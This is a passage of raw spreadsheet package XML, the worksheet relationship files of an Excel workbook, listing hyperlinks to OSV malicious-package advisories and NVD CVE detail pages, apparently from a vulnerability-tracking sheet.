Target="https://osv.dev/vulnerability/MAL-2026-16268" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16269" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16270" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16271" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16273" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16274" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16275" TargetMode="External" Id="rId1065" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77411" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77405" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77408" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77403" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77410" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77412" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75516" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77404" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82410" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77406" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59965" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77360" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59823" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81870" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62949" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63126" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63225" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63506" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64684" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69147" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75513" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76825" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77401" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81176" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81875" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81876" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84997" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85731" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85732" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85756" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86071" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88976" TargetMode="External" Id="rId37" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId1" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54734" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62104" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69399" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69865" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70200" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83944" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85889" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92937" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92940" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92941" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92946" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92947" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92953" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92955" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92956" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92960" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85885" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92938" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92948" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45140" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54460" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54617" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54626" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54627" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62101" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62108" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86707" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86709" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86710" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87796" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90822" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90823" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92944" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54053" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54752" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87701" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92934" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92935" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54501" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54618" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92939" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92951" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92957" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54237" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70009" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86863" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92950" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15688" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79752" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92943" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93393" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54670" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54767" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63472" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76949" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82761" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85500" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86533" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88952" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91039" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92860" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45143" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47252" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77903" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88795" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92952" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14850" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15815" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25283" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28326" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54239" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54504" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54519" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54612" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54671" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54916" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77614" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78295" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85130" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86801" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87786" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88792" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88904" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92918" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92970" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92972" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52836" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54343" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54571" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63459" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69197" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77615" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86864" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89036" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89418" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92971" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92987" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19477" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68791" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87963" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92914" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92954" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92985" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92986" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66580" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71538" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92958" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93292" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93426" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54507" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55062" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54580" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54581" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54583" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54597" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54253" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54354" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54451" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56795" TargetMode="External" Id="rId120" /><Relationship 